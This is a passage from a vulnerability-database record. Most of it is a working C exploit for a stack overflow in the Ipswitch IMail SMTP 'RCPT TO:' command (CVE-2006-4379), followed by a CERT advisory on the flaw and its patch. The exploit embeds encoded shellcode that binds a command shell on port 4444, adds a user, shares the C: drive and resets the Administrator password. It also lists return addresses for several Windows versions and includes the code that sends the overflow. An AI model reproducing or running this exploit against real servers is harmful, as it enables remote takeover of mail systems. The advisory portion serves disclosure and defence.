=\n\"\\x33\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x93\"\n\"\\x7b\\xbd\\x36\\x83\\xee\\xfc\\xe2\\xf4\\x6f\\x11\\x56\\x7b\\x7b\\x82\\x42\\xc9\"\n\"\\x6c\\x1b\\x36\\x5a\\xb7\\x5f\\x36\\x73\\xaf\\xf0\\xc1\\x33\\xeb\\x7a\\x52\\xbd\"\n\"\\xdc\\x63\\x36\\x69\\xb3\\x7a\\x56\\x7f\\x18\\x4f\\x36\\x37\\x7d\\x4a\\x7d\\xaf\"\n\"\\x3f\\xff\\x7d\\x42\\x94\\xba\\x77\\x3b\\x92\\xb9\\x56\\xc2\\xa8\\x2f\\x99\\x1e\"\n\"\\xe6\\x9e\\x36\\x69\\xb7\\x7a\\x56\\x50\\x18\\x77\\xf6\\xbd\\xcc\\x67\\xbc\\xdd\"\n\"\\x90\\x57\\x36\\xbf\\xff\\x5f\\xa1\\x57\\x50\\x4a\\x66\\x52\\x18\\x38\\x8d\\xbd\"\n\"\\xd3\\x77\\x36\\x46\\x8f\\xd6\\x36\\x76\\x9b\\x25\\xd5\\xb8\\xdd\\x75\\x51\\x66\"\n\"\\x6c\\xad\\xdb\\x65\\xf5\\x13\\x8e\\x04\\xfb\\x0c\\xce\\x04\\xcc\\x2f\\x42\\xe6\"\n\"\\xfb\\xb0\\x50\\xca\\xa8\\x2b\\x42\\xe0\\xcc\\xf2\\x58\\x50\\x12\\x96\\xb5\\x34\"\n\"\\xc6\\x11\\xbf\\xc9\\x43\\x13\\x64\\x3f\\x66\\xd6\\xea\\xc9\\x45\\x28\\xee\\x65\"\n\"\\xc0\\x28\\xfe\\x65\\xd0\\x28\\x42\\xe6\\xf5\\x13\\xac\\x6a\\xf5\\x28\\x34\\xd7\"\n\"\\x06\\x13\\x19\\x2c\\xe3\\xbc\\xea\\xc9\\x45\\x11\\xad\\x67\\xc6\\x84\\x6d\\x5e\"\n\"\\x37\\xd6\\x93\\xdf\\xc4\\x84\\x6b\\x65\\xc6\\x84\\x6d\\x5e\\x76\\x32\\x3b\\x7f\"\n\"\\xc4\\x84\\x6b\\x66\\xc7\\x2f\\xe8\\xc9\\x43\\xe8\\xd5\\xd1\\xea\\xbd\\xc4\\x61\"\n\"\\x6c\\xad\\xe8\\xc9\\x43\\x1d\\xd7\\x52\\xf5\\x13\\xde\\x5b\\x1a\\x9e\\xd7\\x66\"\n\"\\xca\\x52\\x71\\xbf\\x74\\x11\\xf9\\xbf\\x71\\x4a\\x7d\\xc5\\x39\\x85\\xff\\x1b\"\n\"\\x6d\\x39\\x91\\xa5\\x1e\\x01\\x85\\x9d\\x38\\xd0\\xd5\\x44\\x6d\\xc8\\xab\\xc9\"\n\"\\xe6\\x3f\\x42\\xe0\\xc8\\x2c\\xef\\x67\\xc2\\x2a\\xd7\\x37\\xc2\\x2a\\xe8\\x67\"\n\"\\x6c\\xab\\xd5\\x9b\\x4a\\x7e\\x73\\x65\\x6c\\xad\\xd7\\xc9\\x6c\\x4c\\x42\\xe6\"\n\"\\x18\\x2c\\x41\\xb5\\x57\\x1f\\x42\\xe0\\xc1\\x84\\x6d\\x5e\\x63\\xf1\\xb9\\x69\"\n\"\\xc0\\x84\\x6b\\xc9\\x43\\x7b\\xbd\\x36\";\n\n/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */\nunsigned char AddUser[] =\n\"\\x2b\\xc9\\x83\\xe9\\xcb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xb2\"\n\"\\xe6\\xaf\\x6a\\x83\\xeb\\xfc\\xe2\\xf4\\x4e\\x0e\\xeb\\x6a\\xb2\\xe6\\x24\\x2f\"\n\"\\x8e\\x6d\\xd3\\x6f\\xca\\xe7\\x40\\xe1\\xfd\\xfe\\x24\\x35\\x92\\xe7\\x44\\x23\"\n\"\\x39\\xd2\\x24\\x6b\\x5c\\xd7\\x6f\\xf3\\x1e\\x62\\x6f\\x1e\\xb5\\x27\\x65\\x67\"\n\"\\xb3\\x24\\x44\\x9e\\x89\\xb2\\x8b\\x6e\\xc7\\x03\\x24\\x35\\x96\\xe7\\x44\\x0c\"\n\"\\x39\\xea\\xe4\\xe1\\xed\\xfa\\xae\\x81\\x39\\xfa\\x24\\x6b\\x59\\x6f\\xf3\\x4e\"\n\"\\xb6\\x25\\x9e\\xaa\\xd6\\x6d\\xef\\x5a\\x37\\x26\\xd7\\x66\\x39\\xa6\\xa3\\xe1\"\n\"\\xc2\\xfa\\x02\\xe1\\xda\\xee\\x44\\x63\\x39\\x66\\x1f\\x6a\\xb2\\xe6\\x24\\x02\"\n\"\\x8e\\xb9\\x9e\\x9c\\xd2\\xb0\\x26\\x92\\x31\\x26\\xd4\\x3a\\xda\\x16\\x25\\x6e\"\n\"\\xed\\x8e\\x37\\x94\\x38\\xe8\\xf8\\x95\\x55\\x85\\xc2\\x0e\\x9c\\x83\\xd7\\x0f\"\n\"\\x92\\xc9\\xcc\\x4a\\xdc\\x83\\xdb\\x4a\\xc7\\x95\\xca\\x18\\x92\\xa3\\xdd\\x18\"\n\"\\xdd\\x94\\x8f\\x2f\\xc0\\x94\\xc0\\x18\\x92\\xc9\\xee\\x2e\\xf6\\xc6\\x89\\x4c\"\n\"\\x92\\x88\\xca\\x1e\\x92\\x8a\\xc0\\x09\\xd3\\x8a\\xc8\\x18\\xdd\\x93\\xdf\\x4a\"\n\"\\xf3\\x82\\xc2\\x03\\xdc\\x8f\\xdc\\x1e\\xc0\\x87\\xdb\\x05\\xc0\\x95\\x8f\\x2f\"\n\"\\xc0\\x94\\xc0\\x18\\x92\\xc9\\xee\\x2e\\xf6\\xe6\\xaf\\x6a\";\n\n/* win32_exec - CMD=net user Administrator \"p@ssw0rd\" Size=187 Encoder=Pex http://metasploit.com */\nunsigned char ChangeAdmin[] =\n\"\\x29\\xc9\\x83\\xe9\\xda\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x74\"\n\"\\xb8\\x4f\\xba\\x83\\xee\\xfc\\xe2\\xf4\\x88\\x50\\x0b\\xba\\x74\\xb8\\xc4\\xff\"\n\"\\x48\\x33\\x33\\xbf\\x0c\\xb9\\xa0\\x31\\x3b\\xa0\\xc4\\xe5\\x54\\xb9\\xa4\\xf3\"\n\"\\xff\\x8c\\xc4\\xbb\\x9a\\x89\\x8f\\x23\\xd8\\x3c\\x8f\\xce\\x73\\x79\\x85\\xb7\"\n\"\\x75\\x7a\\xa4\\x4e\\x4f\\xec\\x6b\\xbe\\x01\\x5d\\xc4\\xe5\\x50\\xb9\\xa4\\xdc\"\n\"\\xff\\xb4\\x04\\x31\\x2b\\xa4\\x4e\\x51\\xff\\xa4\\xc4\\xbb\\x9f\\x31\\x13\\x9e\"\n\"\\x70\\x7b\\x7e\\x7a\\x10\\x33\\x0f\\x8a\\xf1\\x78\\x37\\xb6\\xff\\xf8\\x43\\x31\"\n\"\\x04\\xa4\\xe2\\x31\\x1c\\xb0\\xa4\\xb3\\xff\\x38\\xff\\xba\\x74\\xb8\\xc4\\xd2\"\n\"\\x48\\xe7\\x7e\\x4c\\x14\\xee\\xc6\\x42\\xf7\\x78\\x34\\xea\\x1c\\x48\\xc5\\xbe\"\n\"\\x2b\\xd0\\xd7\\x44\\xfe\\xb6\\x18\\x45\\x93\\xd6\\x2a\\xce\\x54\\xcd\\x3c\\xdf\"\n\"\\x06\\x98\\x0b\\xc8\\x15\\xd3\\x2a\\x9a\\x5b\\xd9\\x2b\\xde\\x74\\xb8\\x4f\\xba\";\n\n\n WSADATA wsaData;\n\n struct hostent *hp;\n struct sockaddr_in sockin;\n char buf[300], *check;\n int sockfd, bytes;\n int plen, i, JMP;\n char *hostname;\n unsigned short port;\n\n printf(\"IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\\n\");\n printf(\"Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\\n\");\n if (argc <= 1)\n {\n\t\tprintf(\"Usage: %s [hostname] [port] <Payload> <JMP>\\n\", argv[0]);\n \tprintf(\"Default port is 25 \\r\\n\");\n\t\tprintf(\"==============================\\n\");\n\t \tprintf(\"Payload Options: 1 = Default\\n\");\n\t\tprintf(\"==============================\\n\");\n\t \tprintf(\"1 = Share C:\\\\ as 'Export' Share\\n\");\n\t \tprintf(\"2 = Add User 'Error' with Password 'Error'\\n\");\n\t \tprintf(\"3 = Win32 Bind CMD to Port 4444\\n\");\n\t\tprintf(\"4 = Change Administrator Password to 'p@ssw0rd'\\n\");\n\t\tprintf(\"==============================\\n\");\n\t \tprintf(\"JMP Options: 1 = Default\\n\");\n\t\tprintf(\"==============================\\n\");\n\t \tprintf(\"1 = IMAIL 8.x SMTPDLL.DLL\t [pop ebp, ret] 0x10036f71 \\n\");\n\t\tprintf(\"2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \\n\");\n\t\tprintf(\"3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \\n\");\n\t\tprintf(\"4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \\n\");\n\t\tprintf(\"5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \\n\");\n\t\tprintf(\"6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \\n\");\n\t\tprintf(\"7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \\n\");\n\t\tprintf(\"8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \\r\\n\");\n\n exit(0);\n \t}\n\n \thostname = argv[1];\n \tif (argv[2]) port = atoi(argv[2]);\n \t\telse port = atoi(\"25\");\n \tif (argv[4]) JMP = atoi(argv[4]);\n\t\telse JMP = atoi(\"1\");\n\n \tif (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)\n \t{\n \tfprintf(stderr, \"Error setting up with WinSock v1.1\\n\");\n \texit(-1);\n \t}\n\n\n \thp = gethostbyname(hostname);\n \tif (hp == NULL)\n \t{\n \tprintf(\"ERROR: Uknown host %s\\n\", hostname);\n\t \tprintf(\"%s\",hostname);\n \texit(-1);\n \t}\n\n \tsockin.sin_family = hp->h_addrtype;\n \tsockin.sin_port = htons(port);\n \tsockin.sin_addr = *((struct in_addr *)hp->h_addr);\n\n \tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)\n \t{\n \tprintf(\"ERROR: Socket Error\\n\");\n \texit(-1);\n \t}\n\n \tif ((connect(sockfd, (struct sockaddr *) &sockin,\n sizeof(sockin))) == SOCKET_ERROR)\n \t{\n \tprintf(\"ERROR: Connect Error\\n\");\n \tclosesocket(sockfd);\n \tWSACleanup();\n \texit(-1);\n \t}\n\n \tprintf(\"Connected to [%s] on port [%d], sending overflow....\\n\",\n hostname, port);\n\n\n \tif ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)\n \t{\n \tprintf(\"ERROR: Recv Error\\n\");\n \tclosesocket(sockfd);\n \tWSACleanup();\n \texit(1);\n \t}\n\n \t/* wait for SMTP service welcome*/\n \tbuf[bytes] = '\\0';\n \tcheck = strstr(buf, \"220\");\n \tif (check == NULL)\n \t{\n \tprintf(\"ERROR: NO response from SMTP service\\n\");\n \tclosesocket(sockfd);\n \tWSACleanup();\n \texit(-1);\n \t}\n\n\n // JMP to EAX = Results in a Corrupted Stack\n // so instead we POP EBP, RET to restore pointer and then return\n // this causes code procedure to continue\n /*\n \t\t['IMail 8.x Universal', 0x10036f71 ],\n\t\t['Windows 2003 SP1 English', 0x7c87d8af ],\n\t\t['Windows 2003 SP0 English', 0x77d5c14c ],\n\t\t['Windows XP SP2 English', 0x7c967e23 ],\n\t\t['Windows XP SP1 English', 0x71ab389c ],\n\t\t['Windows XP SP0 English', 0x71ab389c ],\n\t\t['Windows 2000 Universal English', 0x75021397 ],\n\t\t['Windows 2000 Universal French', 0x74fa1397],\n\t\t['Windows XP SP1 - SP2 German', 0x77d18c14],\n\t*/\n \tchar Exp[] = \"RCPT TO: <@\";\t\t\t\t\t\t// This stores our JMP between the @ and :\n \tchar Win2k3SP1E[] = \"\\xaf\\xd8\\x87\\x7c:\";\t\t//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af\n \tchar WinXPSP2E[] = \"\\x23\\x7e\\x96\\x7c:\";\t\t\t//WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23\n \tchar IMail815[] = \"\\x71\\x6f\\x03\\x10:\"; \t\t\t//IMAIL 8.15 SMTPDLL.DLL\t [pop ebp, ret] 0x10036f71\n\tchar Win2k3SP0E[] = \"\\x4c\\xc1\\xd5\\x77:\";\t\t//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c\n\tchar WinXPSP2[] = \"\\x23\\x7e\\x96\\x7c:\";\t\t\t//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23\n\tchar WinXPSP1[] = \"\\x9c\\x38\\xab\\x71:\";\t\t\t//WinXP SP1 and 0 English U32\t[pop ebp, ret]0x71ab389c\n\tchar Win2KE[] = \"\\x97\\x31\\x02\\x75:\";\t\t\t//Win2k English All SPs\t\t\t[pop ebp, ret]0x75021397\n\tchar Win2KF[] = \"\\x97\\x13\\xfa\\x74:\";\t\t\t// As above except French Win2k\t[pop ebp, ret]0x74fa1397\n\tchar WinXPG[] = \"\\x14\\x8c\\xd1\\x77:\";\t\t\t//WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14\n\n\tchar tail[] = \"SSS>\\n\";\t\t\t\t\t\t\t// This closes the RCPT cmd. Any characters work.\n\t// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems\n\t// After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works\n\t// On all versions from 8.x to 2006 (9.x?)\n\tchar StackS[] = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\";\t// Stabolize Stack prior to payload.\n \tmemset(overflow, 0, 1028);\n \tstrcat(overflow, Exp);\n\tif (JMP == 1)\n\t{\n\t\tprintf(\"Using IMail 8.15 SMTDP.DLL JMP\\n\");\n\t\tstrcat(overflow, IMail815);\n\t} else if (JMP == 2)\n\t{\n\t\tprintf(\"Using Win2003 SP1 NTDLL.DLL JMP\\n\");\n\t\tstrcat(overflow, Win2k3SP1E);\n\t} else if (JMP == 3)\n\t{\n\t\tprintf(\"Using Win2003 SP0 USER32.DLL JMP\\n\");\n\t\tstrcat(overflow, Win2k3SP0E);\n\t} else if (JMP == 4)\n\t{\n\t\tprintf(\"Using WinXP SP2 NTDLL.DLL JMP\\n\");\n\t\tstrcat(overflow, WinXPSP2E);\n\t} else if (JMP == 5)\n\t{\n\t\tprintf(\"Using WinXP SP1 and SP0 USER32.DLL JMP\\n\");\n\t\tstrcat(overflow, WinXPSP1);\n\t} else if (JMP == 6)\n\t{\n\t\tprintf(\"Using Win2000 Universal English USER32.DLL JMP\\n\");\n\t\tstrcat(overflow, Win2KE);\n\t} else if (JMP == 7)\n\t{\n\t\tprintf(\"Using Win2000 Universal French USER32.DLL JMP\\n\");\n\t\tstrcat(overflow, Win2KF);\n\t} else if (JMP == 8)\n\t{\n\t\tprintf(\"Using WinXP SP2 and SP1 German USER32.DLL JMP\\n\");\n\t\tstrcat(overflow, WinXPG);\n\t} else {\n\t\tprintf(\"Using IMail 8.15 SMTDP.DLL JMP\\n\");\n\t\tstrcat(overflow, IMail815);\n\t}\n\t\t\n\n\n // Setup Payload Options\n\tif (atoi(argv[3]) == 1)\n\t{\n\t\tprintf(\"Using Root Share Payload\\n\");\n\t\tplen = 544 - ((strlen(RootShare) + strlen(StackS)));\n\t\tfor (i=0; i<plen; i++){\n\t\t\tstrcat(overflow, \"\\x90\");\n\t\t}\n\t\tstrcat(overflow, StackS);\n\t\tstrcat(overflow, RootShare);\n\n\t} else if (atoi(argv[3]) == 2)\n\t{\n\t\tprintf(\"Using Add User Payload\\n\");\n\t\tplen = 544 - ((strlen(AddUser)+ strlen(StackS)));\n\t\tfor (i=0; i<plen; i++){\n\t\t\tstrcat(overflow, \"\\x90\");\n\t\t}\n\t\tstrcat(overflow, StackS);\n\t\tstrcat(overflow, AddUser);\n\t} else if (atoi(argv[3]) == 3)\n\t{\n\t\tprintf(\"Using Win32 CMD Bind Payload\\n\");\n\t\tplen = 544 - ((strlen(Win32Bind) + strlen(StackS)));\n\t\tfor (i=0; i<plen; i++){\n\t\t\tstrcat(overflow, \"\\x90\");\n\t\t}\n\t\tstrcat(overflow, StackS);\n\t\tstrcat(overflow, Win32Bind);\n\t} else if (atoi(argv[3]) == 4)\n\t{\n\t\tprintf(\"Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\\n\");\n\t\tplen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));\n\t\tfor (i=0; i<plen; i++){\n\t\t\tstrcat(overflow, \"\\x90\");\n\t\t}\n\t\tstrcat(overflow, StackS);\n\t\tstrcat(overflow, ChangeAdmin);\n\t} else\n\t{\n\t\tprintf(\"Using Win32 CMD Bind Payload\\n\");\n\t\tplen = 544 - ((strlen(Win32Bind) + strlen(StackS)));\n\t\tfor (i=0; i<plen; i++){\n\t\t\tstrcat(overflow, \"\\x90\");\n\t\t}\n\t\tstrcat(overflow, StackS);\n\t\tstrcat(overflow, Win32Bind);\n\t}\n\n\t// Dont forget to add the trailing characters to set up stack overflow\n\tstrcat(overflow, tail);\n\n\n\n\t// Connect to SMTP Server and Setup Up Email\n \tchar EHLO[] = \"EHLO \\r\\n\";\n \tchar MF[] = \"MAIL FROM <TEST@TEST> \\r\\n\";\n \tsend(sockfd, EHLO, strlen(EHLO), 0);\n \tSleep(1000);\n \tsend(sockfd, MF, strlen(MF), 0);\n \tSleep(1000);\n\n\n \tif (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)\n \t{\n\t\tprintf(\"ERROR: Send Error\\n\");\n \tclosesocket(sockfd);\n \tWSACleanup();\n \texit(-1);\n \t}\n\n \tprintf(\"Exploit Sent.....\\r\\n\");\n\tif (atoi(argv[3]) == 3)\n\t{\n\t\tprintf(\"Check Shell on Port 4444\\n\");\n\t\tclosesocket(sockfd);\n \tWSACleanup();\n \texit(0);\n\t}\n\n\tprintf(\"Checking If Exploit Executed....\\r\\n\");\n\tSleep(1000);\n\tclosesocket(sockfd);\n\n\tsockin.sin_family = hp->h_addrtype;\n \tsockin.sin_port = htons(port);\n \tsockin.sin_addr = *((struct in_addr *)hp->h_addr);\n\n \tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)\n \t{\n \tprintf(\"ERROR: Socket Error\\n\");\n \texit(-1);\n \t}\n\n \tif ((connect(sockfd, (struct sockaddr *) &sockin,\n sizeof(sockin))) == SOCKET_ERROR)\n \t{\n \tprintf(\"Exploit Successfully Delivered!\\n\");\n\t\tclosesocket(sockfd);\n\t\tWSACleanup();\n\t\tprintf(\"Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!\");\n\t\texit(0);\n \t}\n\tprintf(\"...\");\n\tif ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)\n \t{\n \tprintf(\"Exploit Successfully Delivered!\\n\");\n\t\tclosesocket(sockfd);\n\t\tWSACleanup();\n\t\tprintf(\"Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!\");\n\t\texit(0);\n \t}\n\n \t/* wait for SMTP service welcome*/\n \tbuf[bytes] = '\\0';\n \tcheck = strstr(buf, \"220\");\n \tif (check == NULL)\n \t{\n \tprintf(\"Exploit Successfully Delivered!\\n\");\n\t\tclosesocket(sockfd);\n\t\tWSACleanup();\n\t\tprintf(\"Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!\");\n\t\texit(0);\n \t}\n\n\tprintf(\"Exploit Failed: Try A different JMP Method or Payload\\n\");\n\tclosesocket(sockfd);\n \tWSACleanup();\n \texit (1);\n}\n\n// milw0rm.com [2006-10-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2601/"}], "cert": [{"lastseen": "2018-12-25T20:19:02", "bulletinFamily": "info", "description": "### Overview \n\nThe Ipswitch IMail Server is vulnerable to a buffer overflow. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition.\n\n### Description \n\nAccording to [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>):\n\n_A vulnerability that allowed remote attackers to execute arbitrary code within the SMTP daemon was recently discovered. Because of compiler options used to prevent buffer overflow exploitation, arbitrary code execution does not work in 8.2x or 2006, but the exploit can be used to create a Denial of Service condition. Versions 8.1x and lower are vulnerable to the arbitrary code execution and versions prior to 8.1x may also be vulnerable.__ _ \nNote that we are aware of publicly available exploit code for this vulnerability and have received reports of successful exploitation. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code or cause a denial of service condition. \n \n--- \n \n### Solution \n\n**Apply Update** \nThis issue is addressed in [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>). \n \n--- \n \n### Vendor Information\n\n542197\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Ipswitch, Inc \n\nUpdated: December 07, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [Ipswitch Security Advisory 20061101](<http://www.ipswitch.com/support/imail/releases/security_advisory_20061101.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23542197 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ipswitch.com/support/ics/updates/ics20061.asp>\n * <http://www.ipswitch.com/support/imail/releases/im20061.asp>\n * <http://secunia.com/advisories/21795/>\n * <http://www.mail-archive.com/imail_forum@list.ipswitch.com/msg108403.html>\n\n### Credit\n\nThis issue was reported in Ipswitch Security Advisory 20061101 . Ipswitch credits the Zero Day Initiative (ZDI), an initiative launched by TippingPoint, a division of 3Com for reporting this issue. \n\nThis document was written by Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-4379](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4379>) \n---|--- \n**Severity Metric:****** | 12.86 \n**Date Public:** | 2006-09-07 \n**Date First Published:** | 2006-12-07 \n**Date Last Updated: ** | 2006-12-07 18:14 UTC \n**Document Revision: ** | 8 \n", "modified": "2006-12-07T18:14:00", "published": "2006-12-07T00:00:00", "id": "VU:542197", "href": "https://www.kb.cert.org/vuls/id/542197", "type": "cert", "title": "The Ipswitch IMail Server is vulnerable to a buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}